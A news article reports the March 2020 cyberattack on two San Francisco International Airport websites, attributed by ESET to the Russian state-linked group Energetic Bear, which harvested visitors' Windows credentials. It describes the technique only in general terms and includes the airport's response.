A group of hackers linked to the Russian government is believed to be behind the cyberattack on the San Francisco International Airport (SFO) in March.
The Russian state-sponsored group called Energetic Bear, also known as DragonFly, reportedly targeted two of the airport’s websites to gain access to the potential victims’ Windows account information, according to security research firm ESET on Tuesday.
Energetic Bear has been active since 2010 and has focused primarily on targeting organizations in the energy sector, mostly ones in the United States, Turkey and the Middle East. The organization is one of the most active Russian state-sponsored groups and has been identified in a number of widespread hacking campaigns with targets all over the globe, according to multiple Department of Homeland Security and Federal Bureau of Investigations reports.
ESET said on Twitter that “the targeted information was NOT the visitor’s credentials to the compromised websites, but rather the visitor’s own Windows credentials.”
Contrary to what several people reported, #ESETresearch assesses that this attack has no link with any Magecart credential stealer. The targeted information was NOT the visitor's credentials to the compromised websites, but rather the visitor's own Windows credentials. 2/2
— ESET research (@ESETresearch) April 14, 2020
Energetic Bear exploited a known bug in the Internet Explorer’s operating system in order to gain access to users’ login credentials, which can be used to laterally conduct reconnaissance, data theft, or sabotage, using NTML hashes, ZDNET reported.
“The intent was to collect Windows credentials (username/NTLM hash) of visitors by exploiting an SMB feature and the file:// prefix,” ESET research team added.
The SFO confirmed in a memo on April 7 that the attack occurred, saying two of its websites, SFOConnect.com and SFOConstruction.com, were the targets of the cyberattack in March. SFOConnect.com is used by airport employees, while SFOConstruction.com is a portal used by airport construction contractors.
“The attackers inserted malicious computer code on these websites to steal some users’ login credentials,” the April 7 memo reads. “Users possibly impacted by this attack include those accessing these websites from outside the airport network through Internet Explorer on a Windows-based personal device or a device not maintained by SFO.”
The SFO added in the memo that the attackers”may have accessed” users’ usernames and passwords, although that goes contrary to what ESET reported on Tuesday. SFO officials recommend all users change their passwords if they visited the two sites using Internet Explorer from outside the airport’s managed networks.
Both sites are currently back online after a forced password reset for personnel on March 23, pulling the sites offline temporarily, and removing the malicious code from the sites.
Malware researcher at ESET, Matthieu Faou, told ZDNet that the technique used to attack the SFO is one that Energetic Bear/Dragon Fly has been using for years.
Asked if this attack is part of a new campaign aimed at the U.S. aviation sector, Faou said ESET doesn’t know of any other attacks on other airports’ websites.
“According to ESET telemetry, the other websites that were recently compromised are mainly media websites in Eastern Europe,” he added.